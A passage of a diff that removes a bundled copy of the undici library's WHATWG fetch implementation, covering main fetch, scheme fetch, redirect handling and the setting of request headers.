// capability. - // TODO: given global’s relevant settings object’s cross-origin isolated - // capability? - timingInfo.endTime = coarsenedSharedCurrentTime() - - // 10. Set response’s timing info to timingInfo. - response.timingInfo = timingInfo - - // 11. Mark resource timing for timingInfo, originalURL, initiatorType, - // global, and cacheState. - markResourceTiming( - timingInfo, - originalURL, - initiatorType, - globalThis, - cacheState - ) -} - -// https://w3c.github.io/resource-timing/#dfn-mark-resource-timing -function markResourceTiming (timingInfo, originalURL, initiatorType, globalThis, cacheState) { - if (nodeMajor > 18 || (nodeMajor === 18 && nodeMinor >= 2)) { - performance.markResourceTiming(timingInfo, originalURL.href, initiatorType, globalThis, cacheState) - } -} - -// https://fetch.spec.whatwg.org/#abort-fetch -function abortFetch (p, request, responseObject, error) { - // Note: AbortSignal.reason was added in node v17.2.0 - // which would give us an undefined error to reject with. - // Remove this once node v16 is no longer supported. - if (!error) { - error = new DOMException('The operation was aborted.', 'AbortError') - } - - // 1. Reject promise with error. - p.reject(error) - - // 2. If request’s body is not null and is readable, then cancel request’s - // body with error. - if (request.body != null && isReadable(request.body?.stream)) { - request.body.stream.cancel(error).catch((err) => { - if (err.code === 'ERR_INVALID_STATE') { - // Node bug? - return - } - throw err - }) - } - - // 3. If responseObject is null, then return. - if (responseObject == null) { - return - } - - // 4. Let response be responseObject’s response. - const response = responseObject[kState] - - // 5. If response’s body is not null and is readable, then error response’s - // body with error. - if (response.body != null && isReadable(response.body?.stream)) { - response.body.stream.cancel(error).catch((err) => { - if (err.code === 'ERR_INVALID_STATE') { - // Node bug? - return - } - throw err - }) - } -} - -// https://fetch.spec.whatwg.org/#fetching -function fetching ({ - request, - processRequestBodyChunkLength, - processRequestEndOfBody, - processResponse, - processResponseEndOfBody, - processResponseConsumeBody, - useParallelQueue = false, - dispatcher // undici -}) { - // 1. Let taskDestination be null. - let taskDestination = null - - // 2. Let crossOriginIsolatedCapability be false. - let crossOriginIsolatedCapability = false - - // 3. If request’s client is non-null, then: - if (request.client != null) { - // 1. Set taskDestination to request’s client’s global object. - taskDestination = request.client.globalObject - - // 2. Set crossOriginIsolatedCapability to request’s client’s cross-origin - // isolated capability. - crossOriginIsolatedCapability = - request.client.crossOriginIsolatedCapability - } - - // 4. If useParallelQueue is true, then set taskDestination to the result of - // starting a new parallel queue. - // TODO - - // 5. Let timingInfo be a new fetch timing info whose start time and - // post-redirect start time are the coarsened shared current time given - // crossOriginIsolatedCapability. - const currenTime = coarsenedSharedCurrentTime(crossOriginIsolatedCapability) - const timingInfo = createOpaqueTimingInfo({ - startTime: currenTime - }) - - // 6. Let fetchParams be a new fetch params whose - // request is request, - // timing info is timingInfo, - // process request body chunk length is processRequestBodyChunkLength, - // process request end-of-body is processRequestEndOfBody, - // process response is processResponse, - // process response consume body is processResponseConsumeBody, - // process response end-of-body is processResponseEndOfBody, - // task destination is taskDestination, - // and cross-origin isolated capability is crossOriginIsolatedCapability. - const fetchParams = { - controller: new Fetch(dispatcher), - request, - timingInfo, - processRequestBodyChunkLength, - processRequestEndOfBody, - processResponse, - processResponseConsumeBody, - processResponseEndOfBody, - taskDestination, - crossOriginIsolatedCapability - } - - // 7. If request’s body is a byte sequence, then set request’s body to - // request’s body as a body. - // NOTE: Since fetching is only called from fetch, body should already be - // extracted. - assert(!request.body || request.body.stream) - - // 8. If request’s window is "client", then set request’s window to request’s - // client, if request’s client’s global object is a Window object; otherwise - // "no-window". - if (request.window === 'client') { - // TODO: What if request.client is null? - request.window = - request.client?.globalObject?.constructor?.name === 'Window' - ? request.client - : 'no-window' - } - - // 9. If request’s origin is "client", then set request’s origin to request’s - // client’s origin. - if (request.origin === 'client') { - // TODO: What if request.client is null? - request.origin = request.client?.origin - } - - // 10. If all of the following conditions are true: - // TODO - - // 11. If request’s policy container is "client", then: - if (request.policyContainer === 'client') { - // 1. If request’s client is non-null, then set request’s policy - // container to a clone of request’s client’s policy container. [HTML] - if (request.client != null) { - request.policyContainer = clonePolicyContainer( - request.client.policyContainer - ) - } else { - // 2. Otherwise, set request’s policy container to a new policy - // container. - request.policyContainer = makePolicyContainer() - } - } - - // 12. If request’s header list does not contain `Accept`, then: - if (!request.headersList.contains('accept')) { - // 1. Let value be `*/*`. - const value = '*/*' - - // 2. A user agent should set value to the first matching statement, if - // any, switching on request’s destination: - // "document" - // "frame" - // "iframe" - // `text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8` - // "image" - // `image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5` - // "style" - // `text/css,*/*;q=0.1` - // TODO - - // 3. Append `Accept`/value to request’s header list. - request.headersList.append('accept', value) - } - - // 13. If request’s header list does not contain `Accept-Language`, then - // user agents should append `Accept-Language`/an appropriate value to - // request’s header list. - if (!request.headersList.contains('accept-language')) { - request.headersList.append('accept-language', '*') - } - - // 14. If request’s priority is null, then use request’s initiator and - // destination appropriately in setting request’s priority to a - // user-agent-defined object. - if (request.priority === null) { - // TODO - } - - // 15. If request is a subresource request, then: - if (subresourceSet.has(request.destination)) { - // TODO - } - - // 16. Run main fetch given fetchParams. - mainFetch(fetchParams) - .catch(err => { - fetchParams.controller.terminate(err) - }) - - // 17. Return fetchParam's controller - return fetchParams.controller -} - -// https://fetch.spec.whatwg.org/#concept-main-fetch -async function mainFetch (fetchParams, recursive = false) { - // 1. Let request be fetchParams’s request. - const request = fetchParams.request - - // 2. Let response be null. - let response = null - - // 3. If request’s local-URLs-only flag is set and request’s current URL is - // not local, then set response to a network error. - if (request.localURLsOnly && !urlIsLocal(requestCurrentURL(request))) { - response = makeNetworkError('local URLs only') - } - - // 4. Run report Content Security Policy violations for request. - // TODO - - // 5. Upgrade request to a potentially trustworthy URL, if appropriate. - tryUpgradeRequestToAPotentiallyTrustworthyURL(request) - - // 6. If should request be blocked due to a bad port, should fetching request - // be blocked as mixed content, or should request be blocked by Content - // Security Policy returns blocked, then set response to a network error. - if (requestBadPort(request) === 'blocked') { - response = makeNetworkError('bad port') - } - // TODO: should fetching request be blocked as mixed content? - // TODO: should request be blocked by Content Security Policy? - - // 7. If request’s referrer policy is the empty string, then set request’s - // referrer policy to request’s policy container’s referrer policy. - if (request.referrerPolicy === '') { - request.referrerPolicy = request.policyContainer.referrerPolicy - } - - // 8. If request’s referrer is not "no-referrer", then set request’s - // referrer to the result of invoking determine request’s referrer. - if (request.referrer !== 'no-referrer') { - request.referrer = determineRequestsReferrer(request) - } - - // 9. Set request’s current URL’s scheme to "https" if all of the following - // conditions are true: - // - request’s current URL’s scheme is "http" - // - request’s current URL’s host is a domain - // - Matching request’s current URL’s host per Known HSTS Host Domain Name - // Matching results in either a superdomain match with an asserted - // includeSubDomains directive or a congruent match (with or without an - // asserted includeSubDomains directive). [HSTS] - // TODO - - // 10. If recursive is false, then run the remaining steps in parallel. - // TODO - - // 11. If response is null, then set response to the result of running - // the steps corresponding to the first matching statement: - if (response === null) { - response = await (async () => { - const currentURL = requestCurrentURL(request) - - if ( - // - request’s current URL’s origin is same origin with request’s origin, - // and request’s response tainting is "basic" - (sameOrigin(currentURL, request.url) && request.responseTainting === 'basic') || - // request’s current URL’s scheme is "data" - (currentURL.protocol === 'data:') || - // - request’s mode is "navigate" or "websocket" - (request.mode === 'navigate' || request.mode === 'websocket') - ) { - // 1. Set request’s response tainting to "basic". - request.responseTainting = 'basic' - - // 2. Return the result of running scheme fetch given fetchParams. - return await schemeFetch(fetchParams) - } - - // request’s mode is "same-origin" - if (request.mode === 'same-origin') { - // 1. Return a network error. - return makeNetworkError('request mode cannot be "same-origin"') - } - - // request’s mode is "no-cors" - if (request.mode === 'no-cors') { - // 1. If request’s redirect mode is not "follow", then return a network - // error. - if (request.redirect !== 'follow') { - return makeNetworkError( - 'redirect mode cannot be "follow" for "no-cors" request' - ) - } - - // 2. Set request’s response tainting to "opaque". - request.responseTainting = 'opaque' - - // 3. Return the result of running scheme fetch given fetchParams. - return await schemeFetch(fetchParams) - } - - // request’s current URL’s scheme is not an HTTP(S) scheme - if (!urlIsHttpHttpsScheme(requestCurrentURL(request))) { - // Return a network error. - return makeNetworkError('URL scheme must be a HTTP(S) scheme') - } - - // - request’s use-CORS-preflight flag is set - // - request’s unsafe-request flag is set and either request’s method is - // not a CORS-safelisted method or CORS-unsafe request-header names with - // request’s header list is not empty - // 1. Set request’s response tainting to "cors". - // 2. Let corsWithPreflightResponse be the result of running HTTP fetch - // given fetchParams and true. - // 3. If corsWithPreflightResponse is a network error, then clear cache - // entries using request. - // 4. Return corsWithPreflightResponse. - // TODO - - // Otherwise - // 1. Set request’s response tainting to "cors". - request.responseTainting = 'cors' - - // 2. Return the result of running HTTP fetch given fetchParams. - return await httpFetch(fetchParams) - })() - } - - // 12. If recursive is true, then return response. - if (recursive) { - return response - } - - // 13. If response is not a network error and response is not a filtered - // response, then: - if (response.status !== 0 && !response.internalResponse) { - // If request’s response tainting is "cors", then: - if (request.responseTainting === 'cors') { - // 1. Let headerNames be the result of extracting header list values - // given `Access-Control-Expose-Headers` and response’s header list. - // TODO - // 2. If request’s credentials mode is not "include" and headerNames - // contains `*`, then set response’s CORS-exposed header-name list to - // all unique header names in response’s header list. - // TODO - // 3. Otherwise, if headerNames is not null or failure, then set - // response’s CORS-exposed header-name list to headerNames. - // TODO - } - - // Set response to the following filtered response with response as its - // internal response, depending on request’s response tainting: - if (request.responseTainting === 'basic') { - response = filterResponse(response, 'basic') - } else if (request.responseTainting === 'cors') { - response = filterResponse(response, 'cors') - } else if (request.responseTainting === 'opaque') { - response = filterResponse(response, 'opaque') - } else { - assert(false) - } - } - - // 14. Let internalResponse be response, if response is a network error, - // and response’s internal response otherwise. - let internalResponse = - response.status === 0 ? response : response.internalResponse - - // 15. If internalResponse’s URL list is empty, then set it to a clone of - // request’s URL list. - if (internalResponse.urlList.length === 0) { - internalResponse.urlList.push(...request.urlList) - } - - // 16. If request’s timing allow failed flag is unset, then set - // internalResponse’s timing allow passed flag. - if (!request.timingAllowFailed) { - response.timingAllowPassed = true - } - - // 17. If response is not a network error and any of the following returns - // blocked - // - should internalResponse to request be blocked as mixed content - // - should internalResponse to request be blocked by Content Security Policy - // - should internalResponse to request be blocked due to its MIME type - // - should internalResponse to request be blocked due to nosniff - // TODO - - // 18. If response’s type is "opaque", internalResponse’s status is 206, - // internalResponse’s range-requested flag is set, and request’s header - // list does not contain `Range`, then set response and internalResponse - // to a network error. - if ( - response.type === 'opaque' && - internalResponse.status === 206 && - internalResponse.rangeRequested && - !request.headers.contains('range') - ) { - response = internalResponse = makeNetworkError() - } - - // 19. If response is not a network error and either request’s method is - // `HEAD` or `CONNECT`, or internalResponse’s status is a null body status, - // set internalResponse’s body to null and disregard any enqueuing toward - // it (if any). - if ( - response.status !== 0 && - (request.method === 'HEAD' || - request.method === 'CONNECT' || - nullBodyStatus.includes(internalResponse.status)) - ) { - internalResponse.body = null - fetchParams.controller.dump = true - } - - // 20. If request’s integrity metadata is not the empty string, then: - if (request.integrity) { - // 1. Let processBodyError be this step: run fetch finale given fetchParams - // and a network error. - const processBodyError = (reason) => - fetchFinale(fetchParams, makeNetworkError(reason)) - - // 2. If request’s response tainting is "opaque", or response’s body is null, - // then run processBodyError and abort these steps. - if (request.responseTainting === 'opaque' || response.body == null) { - processBodyError(response.error) - return - } - - // 3. Let processBody given bytes be these steps: - const processBody = (bytes) => { - // 1. If bytes do not match request’s integrity metadata, - // then run processBodyError and abort these steps. [SRI] - if (!bytesMatch(bytes, request.integrity)) { - processBodyError('integrity mismatch') - return - } - - // 2. Set response’s body to bytes as a body. - response.body = safelyExtractBody(bytes)[0] - - // 3. Run fetch finale given fetchParams and response. - fetchFinale(fetchParams, response) - } - - // 4. Fully read response’s body given processBody and processBodyError. - await fullyReadBody(response.body, processBody, processBodyError) - } else { - // 21. Otherwise, run fetch finale given fetchParams and response. - fetchFinale(fetchParams, response) - } -} - -// https://fetch.spec.whatwg.org/#concept-scheme-fetch -// given a fetch params fetchParams -function schemeFetch (fetchParams) { - // Note: since the connection is destroyed on redirect, which sets fetchParams to a - // cancelled state, we do not want this condition to trigger *unless* there have been - // no redirects. See https://github.com/nodejs/undici/issues/1776 - // 1. If fetchParams is canceled, then return the appropriate network error for fetchParams. - if (isCancelled(fetchParams) && fetchParams.request.redirectCount === 0) { - return Promise.resolve(makeAppropriateNetworkError(fetchParams)) - } - - // 2. Let request be fetchParams’s request. - const { request } = fetchParams - - const { protocol: scheme } = requestCurrentURL(request) - - // 3. Switch on request’s current URL’s scheme and run the associated steps: - switch (scheme) { - case 'about:': { - // If request’s current URL’s path is the string "blank", then return a new response - // whose status message is `OK`, header list is « (`Content-Type`, `text/html;charset=utf-8`) », - // and body is the empty byte sequence as a body. - - // Otherwise, return a network error. - return Promise.resolve(makeNetworkError('about scheme is not supported')) - } - case 'blob:': { - if (!resolveObjectURL) { - resolveObjectURL = (__nccwpck_require__(4300).resolveObjectURL) - } - - // 1. Let blobURLEntry be request’s current URL’s blob URL entry. - const blobURLEntry = requestCurrentURL(request) - - // https://github.com/web-platform-tests/wpt/blob/7b0ebaccc62b566a1965396e5be7bb2bc06f841f/FileAPI/url/resources/fetch-tests.js#L52-L56 - // Buffer.resolveObjectURL does not ignore URL queries. - if (blobURLEntry.search.length !== 0) { - return Promise.resolve(makeNetworkError('NetworkError when attempting to fetch resource.')) - } - - const blobURLEntryObject = resolveObjectURL(blobURLEntry.toString()) - - // 2. If request’s method is not `GET`, blobURLEntry is null, or blobURLEntry’s - // object is not a Blob object, then return a network error. - if (request.method !== 'GET' || !isBlobLike(blobURLEntryObject)) { - return Promise.resolve(makeNetworkError('invalid method')) - } - - // 3. Let bodyWithType be the result of safely extracting blobURLEntry’s object. - const bodyWithType = safelyExtractBody(blobURLEntryObject) - - // 4. Let body be bodyWithType’s body. - const body = bodyWithType[0] - - // 5. Let length be body’s length, serialized and isomorphic encoded. - const length = isomorphicEncode(`${body.length}`) - - // 6. Let type be bodyWithType’s type if it is non-null; otherwise the empty byte sequence. - const type = bodyWithType[1] ?? '' - - // 7. Return a new response whose status message is `OK`, header list is - // « (`Content-Length`, length), (`Content-Type`, type) », and body is body. - const response = makeResponse({ - statusText: 'OK', - headersList: [ - ['content-length', { name: 'Content-Length', value: length }], - ['content-type', { name: 'Content-Type', value: type }] - ] - }) - - response.body = body - - return Promise.resolve(response) - } - case 'data:': { - // 1. Let dataURLStruct be the result of running the - // data: URL processor on request’s current URL. - const currentURL = requestCurrentURL(request) - const dataURLStruct = dataURLProcessor(currentURL) - - // 2. If dataURLStruct is failure, then return a - // network error. - if (dataURLStruct === 'failure') { - return Promise.resolve(makeNetworkError('failed to fetch the data URL')) - } - - // 3. Let mimeType be dataURLStruct’s MIME type, serialized. - const mimeType = serializeAMimeType(dataURLStruct.mimeType) - - // 4. Return a response whose status message is `OK`, - // header list is « (`Content-Type`, mimeType) », - // and body is dataURLStruct’s body as a body. - return Promise.resolve(makeResponse({ - statusText: 'OK', - headersList: [ - ['content-type', { name: 'Content-Type', value: mimeType }] - ], - body: safelyExtractBody(dataURLStruct.body)[0] - })) - } - case 'file:': { - // For now, unfortunate as it is, file URLs are left as an exercise for the reader. - // When in doubt, return a network error. - return Promise.resolve(makeNetworkError('not implemented... yet...')) - } - case 'http:': - case 'https:': { - // Return the result of running HTTP fetch given fetchParams. - - return httpFetch(fetchParams) - .catch((err) => makeNetworkError(err)) - } - default: { - return Promise.resolve(makeNetworkError('unknown scheme')) - } - } -} - -// https://fetch.spec.whatwg.org/#finalize-response -function finalizeResponse (fetchParams, response) { - // 1. Set fetchParams’s request’s done flag. - fetchParams.request.done = true - - // 2, If fetchParams’s process response done is not null, then queue a fetch - // task to run fetchParams’s process response done given response, with - // fetchParams’s task destination. - if (fetchParams.processResponseDone != null) { - queueMicrotask(() => fetchParams.processResponseDone(response)) - } -} - -// https://fetch.spec.whatwg.org/#fetch-finale -function fetchFinale (fetchParams, response) { - // 1. If response is a network error, then: - if (response.type === 'error') { - // 1. Set response’s URL list to « fetchParams’s request’s URL list[0] ». - response.urlList = [fetchParams.request.urlList[0]] - - // 2. Set response’s timing info to the result of creating an opaque timing - // info for fetchParams’s timing info. - response.timingInfo = createOpaqueTimingInfo({ - startTime: fetchParams.timingInfo.startTime - }) - } - - // 2. Let processResponseEndOfBody be the following steps: - const processResponseEndOfBody = () => { - // 1. Set fetchParams’s request’s done flag. - fetchParams.request.done = true - - // If fetchParams’s process response end-of-body is not null, - // then queue a fetch task to run fetchParams’s process response - // end-of-body given response with fetchParams’s task destination. - if (fetchParams.processResponseEndOfBody != null) { - queueMicrotask(() => fetchParams.processResponseEndOfBody(response)) - } - } - - // 3. If fetchParams’s process response is non-null, then queue a fetch task - // to run fetchParams’s process response given response, with fetchParams’s - // task destination. - if (fetchParams.processResponse != null) { - queueMicrotask(() => fetchParams.processResponse(response)) - } - - // 4. If response’s body is null, then run processResponseEndOfBody. - if (response.body == null) { - processResponseEndOfBody() - } else { - // 5. Otherwise: - - // 1. Let transformStream be a new a TransformStream. - - // 2. Let identityTransformAlgorithm be an algorithm which, given chunk, - // enqueues chunk in transformStream. - const identityTransformAlgorithm = (chunk, controller) => { - controller.enqueue(chunk) - } - - // 3. Set up transformStream with transformAlgorithm set to identityTransformAlgorithm - // and flushAlgorithm set to processResponseEndOfBody. - const transformStream = new TransformStream({ - start () {}, - transform: identityTransformAlgorithm, - flush: processResponseEndOfBody - }, { - size () { - return 1 - } - }, { - size () { - return 1 - } - }) - - // 4. Set response’s body to the result of piping response’s body through transformStream. - response.body = { stream: response.body.stream.pipeThrough(transformStream) } - } - - // 6. If fetchParams’s process response consume body is non-null, then: - if (fetchParams.processResponseConsumeBody != null) { - // 1. Let processBody given nullOrBytes be this step: run fetchParams’s - // process response consume body given response and nullOrBytes. - const processBody = (nullOrBytes) => fetchParams.processResponseConsumeBody(response, nullOrBytes) - - // 2. Let processBodyError be this step: run fetchParams’s process - // response consume body given response and failure. - const processBodyError = (failure) => fetchParams.processResponseConsumeBody(response, failure) - - // 3. If response’s body is null, then queue a fetch task to run processBody - // given null, with fetchParams’s task destination. - if (response.body == null) { - queueMicrotask(() => processBody(null)) - } else { - // 4. Otherwise, fully read response’s body given processBody, processBodyError, - // and fetchParams’s task destination. - return fullyReadBody(response.body, processBody, processBodyError) - } - return Promise.resolve() - } -} - -// https://fetch.spec.whatwg.org/#http-fetch -async function httpFetch (fetchParams) { - // 1. Let request be fetchParams’s request. - const request = fetchParams.request - - // 2. Let response be null. - let response = null - - // 3. Let actualResponse be null. - let actualResponse = null - - // 4. Let timingInfo be fetchParams’s timing info. - const timingInfo = fetchParams.timingInfo - - // 5. If request’s service-workers mode is "all", then: - if (request.serviceWorkers === 'all') { - // TODO - } - - // 6. If response is null, then: - if (response === null) { - // 1. If makeCORSPreflight is true and one of these conditions is true: - // TODO - - // 2. If request’s redirect mode is "follow", then set request’s - // service-workers mode to "none". - if (request.redirect === 'follow') { - request.serviceWorkers = 'none' - } - - // 3. Set response and actualResponse to the result of running - // HTTP-network-or-cache fetch given fetchParams. - actualResponse = response = await httpNetworkOrCacheFetch(fetchParams) - - // 4. If request’s response tainting is "cors" and a CORS check - // for request and response returns failure, then return a network error. - if ( - request.responseTainting === 'cors' && - corsCheck(request, response) === 'failure' - ) { - return makeNetworkError('cors failure') - } - - // 5. If the TAO check for request and response returns failure, then set - // request’s timing allow failed flag. - if (TAOCheck(request, response) === 'failure') { - request.timingAllowFailed = true - } - } - - // 7. If either request’s response tainting or response’s type - // is "opaque", and the cross-origin resource policy check with - // request’s origin, request’s client, request’s destination, - // and actualResponse returns blocked, then return a network error. - if ( - (request.responseTainting === 'opaque' || response.type === 'opaque') && - crossOriginResourcePolicyCheck( - request.origin, - request.client, - request.destination, - actualResponse - ) === 'blocked' - ) { - return makeNetworkError('blocked') - } - - // 8. If actualResponse’s status is a redirect status, then: - if (redirectStatusSet.has(actualResponse.status)) { - // 1. If actualResponse’s status is not 303, request’s body is not null, - // and the connection uses HTTP/2, then user agents may, and are even - // encouraged to, transmit an RST_STREAM frame. - // See, https://github.com/whatwg/fetch/issues/1288 - if (request.redirect !== 'manual') { - fetchParams.controller.connection.destroy() - } - - // 2. Switch on request’s redirect mode: - if (request.redirect === 'error') { - // Set response to a network error. - response = makeNetworkError('unexpected redirect') - } else if (request.redirect === 'manual') { - // Set response to an opaque-redirect filtered response whose internal - // response is actualResponse. - // NOTE(spec): On the web this would return an `opaqueredirect` response, - // but that doesn't make sense server side. - // See https://github.com/nodejs/undici/issues/1193. - response = actualResponse - } else if (request.redirect === 'follow') { - // Set response to the result of running HTTP-redirect fetch given - // fetchParams and response. - response = await httpRedirectFetch(fetchParams, response) - } else { - assert(false) - } - } - - // 9. Set response’s timing info to timingInfo. - response.timingInfo = timingInfo - - // 10. Return response. - return response -} - -// https://fetch.spec.whatwg.org/#http-redirect-fetch -function httpRedirectFetch (fetchParams, response) { - // 1. Let request be fetchParams’s request. - const request = fetchParams.request - - // 2. Let actualResponse be response, if response is not a filtered response, - // and response’s internal response otherwise. - const actualResponse = response.internalResponse - ? response.internalResponse - : response - - // 3. Let locationURL be actualResponse’s location URL given request’s current - // URL’s fragment. - let locationURL - - try { - locationURL = responseLocationURL( - actualResponse, - requestCurrentURL(request).hash - ) - - // 4. If locationURL is null, then return response. - if (locationURL == null) { - return response - } - } catch (err) { - // 5. If locationURL is failure, then return a network error. - return Promise.resolve(makeNetworkError(err)) - } - - // 6. If locationURL’s scheme is not an HTTP(S) scheme, then return a network - // error. - if (!urlIsHttpHttpsScheme(locationURL)) { - return Promise.resolve(makeNetworkError('URL scheme must be a HTTP(S) scheme')) - } - - // 7. If request’s redirect count is 20, then return a network error. - if (request.redirectCount === 20) { - return Promise.resolve(makeNetworkError('redirect count exceeded')) - } - - // 8. Increase request’s redirect count by 1. - request.redirectCount += 1 - - // 9. If request’s mode is "cors", locationURL includes credentials, and - // request’s origin is not same origin with locationURL’s origin, then return - // a network error. - if ( - request.mode === 'cors' && - (locationURL.username || locationURL.password) && - !sameOrigin(request, locationURL) - ) { - return Promise.resolve(makeNetworkError('cross origin not allowed for request mode "cors"')) - } - - // 10. If request’s response tainting is "cors" and locationURL includes - // credentials, then return a network error. - if ( - request.responseTainting === 'cors' && - (locationURL.username || locationURL.password) - ) { - return Promise.resolve(makeNetworkError( - 'URL cannot contain credentials for request mode "cors"' - )) - } - - // 11. If actualResponse’s status is not 303, request’s body is non-null, - // and request’s body’s source is null, then return a network error. - if ( - actualResponse.status !== 303 && - request.body != null && - request.body.source == null - ) { - return Promise.resolve(makeNetworkError()) - } - - // 12. If one of the following is true - // - actualResponse’s status is 301 or 302 and request’s method is `POST` - // - actualResponse’s status is 303 and request’s method is not `GET` or `HEAD` - if ( - ([301, 302].includes(actualResponse.status) && request.method === 'POST') || - (actualResponse.status === 303 && - !GET_OR_HEAD.includes(request.method)) - ) { - // then: - // 1. Set request’s method to `GET` and request’s body to null. - request.method = 'GET' - request.body = null - - // 2. For each headerName of request-body-header name, delete headerName from - // request’s header list. - for (const headerName of requestBodyHeader) { - request.headersList.delete(headerName) - } - } - - // 13. If request’s current URL’s origin is not same origin with locationURL’s - // origin, then for each headerName of CORS non-wildcard request-header name, - // delete headerName from request’s header list. - if (!sameOrigin(requestCurrentURL(request), locationURL)) { - // https://fetch.spec.whatwg.org/#cors-non-wildcard-request-header-name - request.headersList.delete('authorization') - - // https://fetch.spec.whatwg.org/#authentication-entries - request.headersList.delete('proxy-authorization', true) - - // "Cookie" and "Host" are forbidden request-headers, which undici doesn't implement. - request.headersList.delete('cookie') - request.headersList.delete('host') - } - - // 14. If request’s body is non-null, then set request’s body to the first return - // value of safely extracting request’s body’s source. - if (request.body != null) { - assert(request.body.source != null) - request.body = safelyExtractBody(request.body.source)[0] - } - - // 15. Let timingInfo be fetchParams’s timing info. - const timingInfo = fetchParams.timingInfo - - // 16. Set timingInfo’s redirect end time and post-redirect start time to the - // coarsened shared current time given fetchParams’s cross-origin isolated - // capability. - timingInfo.redirectEndTime = timingInfo.postRedirectStartTime = - coarsenedSharedCurrentTime(fetchParams.crossOriginIsolatedCapability) - - // 17. If timingInfo’s redirect start time is 0, then set timingInfo’s - // redirect start time to timingInfo’s start time. - if (timingInfo.redirectStartTime === 0) { - timingInfo.redirectStartTime = timingInfo.startTime - } - - // 18. Append locationURL to request’s URL list. - request.urlList.push(locationURL) - - // 19. Invoke set request’s referrer policy on redirect on request and - // actualResponse. - setRequestReferrerPolicyOnRedirect(request, actualResponse) - - // 20. Return the result of running main fetch given fetchParams and true. - return mainFetch(fetchParams, true) -} - -// https://fetch.spec.whatwg.org/#http-network-or-cache-fetch -async function httpNetworkOrCacheFetch ( - fetchParams, - isAuthenticationFetch = false, - isNewConnectionFetch = false -) { - // 1. Let request be fetchParams’s request. - const request = fetchParams.request - - // 2. Let httpFetchParams be null. - let httpFetchParams = null - - // 3. Let httpRequest be null. - let httpRequest = null - - // 4. Let response be null. - let response = null - - // 5. Let storedResponse be null. - // TODO: cache - - // 6. Let httpCache be null. - const httpCache = null - - // 7. Let the revalidatingFlag be unset. - const revalidatingFlag = false - - // 8. Run these steps, but abort when the ongoing fetch is terminated: - - // 1. If request’s window is "no-window" and request’s redirect mode is - // "error", then set httpFetchParams to fetchParams and httpRequest to - // request. - if (request.window === 'no-window' && request.redirect === 'error') { - httpFetchParams = fetchParams - httpRequest = request - } else { - // Otherwise: - - // 1. Set httpRequest to a clone of request. - httpRequest = makeRequest(request) - - // 2. Set httpFetchParams to a copy of fetchParams. - httpFetchParams = { ...fetchParams } - - // 3. Set httpFetchParams’s request to httpRequest. - httpFetchParams.request = httpRequest - } - - // 3. Let includeCredentials be true if one of - const includeCredentials = - request.credentials === 'include' || - (request.credentials === 'same-origin' && - request.responseTainting === 'basic') - - // 4. Let contentLength be httpRequest’s body’s length, if httpRequest’s - // body is non-null; otherwise null. - const contentLength = httpRequest.body ? httpRequest.body.length : null - - // 5. Let contentLengthHeaderValue be null. - let contentLengthHeaderValue = null - - // 6. If httpRequest’s body is null and httpRequest’s method is `POST` or - // `PUT`, then set contentLengthHeaderValue to `0`. - if ( - httpRequest.body == null && - ['POST', 'PUT'].includes(httpRequest.method) - ) { - contentLengthHeaderValue = '0' - } - - // 7. If contentLength is non-null, then set contentLengthHeaderValue to - // contentLength, serialized and isomorphic encoded. - if (contentLength != null) { - contentLengthHeaderValue = isomorphicEncode(`${contentLength}`) - } - - // 8. If contentLengthHeaderValue is non-null, then append - // `Content-Length`/contentLengthHeaderValue to httpRequest’s header - // list. - if (contentLengthHeaderValue != null) { - httpRequest.headersList.append('content-length', contentLengthHeaderValue) - } - - // 9. If contentLengthHeaderValue is non-null, then append (`Content-Length`, - // contentLengthHeaderValue) to httpRequest’s header list. - - // 10. If contentLength is non-null and httpRequest’s keepalive is true, - // then: - if (contentLength != null && httpRequest.keepalive) { - // NOTE: keepalive is a noop outside of browser context. - } - - // 11. If httpRequest’s referrer is a URL, then append - // `Referer`/httpRequest’s referrer, serialized and isomorphic encoded, - // to httpRequest’s header list. - if (httpRequest.referrer instanceof URL) { - httpRequest.headersList.append('referer', isomorphicEncode(httpRequest.referrer.href)) - } - - // 12. Append a request `Origin` header for httpRequest. - appendRequestOriginHeader(httpRequest) - - // 13. Append the Fetch metadata headers for httpRequest. [FETCH-METADATA] - appendFetchMetadata(httpRequest) - - // 14. If httpRequest’s header list does not contain `User-Agent`, then - // user agents should append `User-Agent`/default `User-Agent` value to - // httpRequest’s header list. - if (!httpRequest.headersList.contains('user-agent')) { - httpRequest.headersList.append('user-agent', typeof esbuildDetection === 'undefined' ? 'undici' : 'node') - } - - // 15. If httpRequest’s cache mode is "default" and httpRequest’s header - // list contains `If-Modified-Since`, `If-None-Match`, - // `If-Unmodified-Since`, `If-Match`, or `If-Range`, then set - // httpRequest’s cache mode to "no-store". - if ( - httpRequest.cache === 'default' && - (httpRequest.headersList.contains('if-modified-since') || - httpRequest.headersList.contains('if-none-match') || - httpRequest.headersList.contains('if-unmodified-since') || - httpRequest.headersList.contains('if-match') || - httpRequest.headersList.contains('if-range')) - ) { - httpRequest.cache = 'no-store' - } - - // 16. If httpRequest’s cache mode is "no-cache", httpRequest’s prevent - // no-cache cache-control header modification flag is unset, and - // httpRequest’s header list does not contain `Cache-Control`, then append - // `Cache-Control`/`max-age=0` to httpRequest’s header list. - if ( - httpRequest.cache === 'no-cache' && - !httpRequest.preventNoCacheCacheControlHeaderModification && - !httpRequest.headersList.contains('cache-control') - ) { - httpRequest.headersList.append('cache-control', 'max-age=0') - } - - // 17. If httpRequest’s cache mode is "no-store" or "reload", then: - if (httpRequest.cache === 'no-store' || httpRequest.cache === 'reload') { - // 1. If httpRequest’s header list does not contain `Pragma`, then append - // `Pragma`/`no-cache` to httpRequest’s header list. - if (!httpRequest.headersList.contains('pragma')) { - httpRequest.headersList.append('pragma', 'no-cache') - } - - // 2. If httpRequest’s header list does not contain `Cache-Control`, - // then append `Cache-Control`/`no-cache` to httpRequest’s header list. - if (!httpRequest.headersList.contains('cache-control')) { - httpRequest.headersList.append('cache-control', 'no-cache') - } - } - - // 18. If httpRequest’s header list contains `Range`, then append - // `Accept-Encoding`/`identity` to httpRequest’s header list. - if (httpRequest.headersList.contains('range')) { - httpRequest.headersList.append('accept-encoding', 'identity') - } - - // 19. Modify httpRequest’s header list per HTTP. Do not append a given - // header if httpRequest’s header list contains that header’s name. - // TODO: https://github.com/whatwg/fetch/issues/1285#issuecomment-896560129 - if (!httpRequest.headersList.contains('accept-encoding')) { - if (urlHasHttpsScheme(requestCurrentURL(httpRequest))) { - httpRequest.headersList.append('accept-encoding', 'br, gzip, deflate') - } else { - httpRequest.headersList.append('accept-encoding', 'gzip, 